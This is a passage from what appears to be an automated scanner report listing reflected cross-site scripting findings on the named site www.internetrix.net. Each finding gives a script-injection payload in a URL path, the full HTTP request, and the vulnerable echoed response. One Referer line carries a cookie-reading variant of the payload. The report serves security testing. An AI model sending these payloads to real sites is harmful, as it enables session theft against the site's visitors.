Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.6.10.1302308294; fontsize=100

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:24:54 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30261


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - actionbe0c7"><script>alert(1)</script>c3045ca88cd/event_signup/1066">
...[SNIP]...

1.118. http://www.internetrix.net/captcha/77ebd8dc1911e2a888fa4585da1fe3e3.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /captcha/77ebd8dc1911e2a888fa4585da1fe3e3.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac5e2"><script>alert(1)</script>d100cc1e7c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /captchaac5e2"><script>alert(1)</script>d100cc1e7c7/77ebd8dc1911e2a888fa4585da1fe3e3.png HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/optimizer.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:19:43 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30300


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - captchaac5e2"><script>alert(1)</script>d100cc1e7c7/77ebd8dc1911e2a888fa4585da1fe3e3.png">
...[SNIP]...

1.119. http://www.internetrix.net/captcha/77ebd8dc1911e2a888fa4585da1fe3e3.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /captcha/77ebd8dc1911e2a888fa4585da1fe3e3.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0e37"><script>alert(1)</script>9a58bced905 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /captcha/77ebd8dc1911e2a888fa4585da1fe3e3.pngd0e37"><script>alert(1)</script>9a58bced905 HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/optimizer.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:19:50 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30342


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - captcha/77ebd8dc1911e2a888fa4585da1fe3e3.pngd0e37"><script>alert(1)</script>9a58bced905">
...[SNIP]...

1.120. http://www.internetrix.net/cgi-bin/ajax/utm_vars.cgi [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /cgi-bin/ajax/utm_vars.cgi

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fdfd"><script>alert(1)</script>22f25afd9d1e57476 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /cgi-bin9fdfd"><script>alert(1)</script>22f25afd9d1e57476/ajax/utm_vars.cgi?action=get_utm_variables&object_type=page&object_id=960&utm_params_applied=0&HTTP_ACCEPT_LANGUAGE=&REMOTE_ADDR=&HTTP_REFERER=&HTTP_USER_AGENT=&screen_width=1920&screen_height=1200&screen_depth=16&window_width=1079&window_height=1038&java_enabled=1&flash_vers=10.2.154 HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/optimizer.html
Origin: http://www.internetrix.net
X-Prototype-Version: 1.6.0.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmb=173809275.0.10.1302308294; __utmc=173809275; __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:19:33 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30256


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - cgi-bin9fdfd"><script>alert(1)</script>22f25afd9d1e57476/ajax/utm_vars.cgi">
...[SNIP]...

1.121. http://www.internetrix.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 528f3"><script>alert(1)</script>476275b45cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico528f3"><script>alert(1)</script>476275b45cb HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.1.10.1302308294; fontsize=100

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:19:18 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - favicon.ico528f3"><script>alert(1)</script>476275b45cb">
...[SNIP]...

1.122. http://www.internetrix.net/flash/video.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /flash/video.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe4e5"><script>alert(1)</script>b4521d281d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /flashfe4e5"><script>alert(1)</script>b4521d281d6/video.swf HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/optimizer.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmb=173809275.0.10.1302308294; __utmc=173809275; __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:19:39 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - flashfe4e5"><script>alert(1)</script>b4521d281d6/video.swf">
...[SNIP]...

1.123. http://www.internetrix.net/flash/video.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /flash/video.swf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d5b6"><script>alert(1)</script>e5d06c4b308 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /flash/video.swf5d5b6"><script>alert(1)</script>e5d06c4b308 HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/optimizer.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmb=173809275.0.10.1302308294; __utmc=173809275; __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:19:46 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30237


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - flash/video.swf5d5b6"><script>alert(1)</script>e5d06c4b308">
...[SNIP]...

1.124. http://www.internetrix.net/freestyle/optimizer [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /freestyle/optimizer

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9af0"><script>alert(1)</script>2c6e5ad129d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /freestylec9af0"><script>alert(1)</script>2c6e5ad129d/optimizer HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:18:41 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30261


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - freestylec9af0"><script>alert(1)</script>2c6e5ad129d/optimizer">
...[SNIP]...

1.125. http://www.internetrix.net/freestyle/optimizer [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /freestyle/optimizer

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0633"><script>alert(1)</script>c221bb42d42 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /freestyle/optimizerf0633"><script>alert(1)</script>c221bb42d42 HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:18:49 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30263


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - freestyle/optimizerf0633"><script>alert(1)</script>c221bb42d42">
...[SNIP]...

1.126. http://www.internetrix.net/general.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /general.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1c3f"><script>alert(1)</script>c379c8587fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /general.cssa1c3f"><script>alert(1)</script>c379c8587fa HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/accreditations/dbcde-panel-member/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.4.10.1302308294; fontsize=100

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:23:59 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30234


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - general.cssa1c3f"><script>alert(1)</script>c379c8587fa">
...[SNIP]...

1.127. http://www.internetrix.net/optimizer.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /optimizer.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a124a"><script>alert(1)</script>ef5e119e82d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /optimizer.htmla124a"><script>alert(1)</script>ef5e119e82d HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:18:35 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30216


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - optimizer.htmla124a"><script>alert(1)</script>ef5e119e82d">
...[SNIP]...

1.128. http://www.internetrix.net/page/accreditations/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/accreditations/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26036"><script>alert(1)</script>e39a76957d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page26036"><script>alert(1)</script>e39a76957d8/accreditations/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fontsize=100; __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmb=173809275.2.10.1302308294; __utmc=173809275

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:21:59 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30203


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - page26036"><script>alert(1)</script>e39a76957d8/accreditations">
...[SNIP]...

1.129. http://www.internetrix.net/page/accreditations/dbcde-panel-member/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/accreditations/dbcde-panel-member/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b35d5"><script>alert(1)</script>635a3313a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pageb35d5"><script>alert(1)</script>635a3313a6/accreditations/dbcde-panel-member/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/accreditations/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.4.10.1302308294; fontsize=100

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:23:55 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30299


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - pageb35d5"><script>alert(1)</script>635a3313a6/accreditations/dbcde-panel-member">
...[SNIP]...

1.130. http://www.internetrix.net/page/articles/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/articles/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4291"><script>alert(1)</script>bf8317b02a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagec4291"><script>alert(1)</script>bf8317b02a5/articles/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fontsize=100; __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmb=173809275.2.10.1302308294; __utmc=173809275

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:21:49 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30191


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - pagec4291"><script>alert(1)</script>bf8317b02a5/articles">
...[SNIP]...

1.131. http://www.internetrix.net/page/articles/latest-news/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/articles/latest-news/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bac3a"><script>alert(1)</script>4ec4125112c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagebac3a"><script>alert(1)</script>4ec4125112c/articles/latest-news/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/articles/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.8.10.1302308294; fontsize=100

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:25:37 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30244


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - pagebac3a"><script>alert(1)</script>4ec4125112c/articles/latest-news">
...[SNIP]...

1.132. http://www.internetrix.net/page/articles/newsletters/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/articles/newsletters/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3db9e"><script>alert(1)</script>e472d9060e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page3db9e"><script>alert(1)</script>e472d9060e6/articles/newsletters/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/articles/latest-news/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fontsize=100; __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.9.10.1302308294

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:25:58 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30275


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - page3db9e"><script>alert(1)</script>e472d9060e6/articles/newsletters">
...[SNIP]...

1.133. http://www.internetrix.net/page/contact-us/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/contact-us/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3392"><script>alert(1)</script>03fc8cb16ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagec3392"><script>alert(1)</script>03fc8cb16ef/contact-us/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/optimizer.htmla124a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eef5e119e82d
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
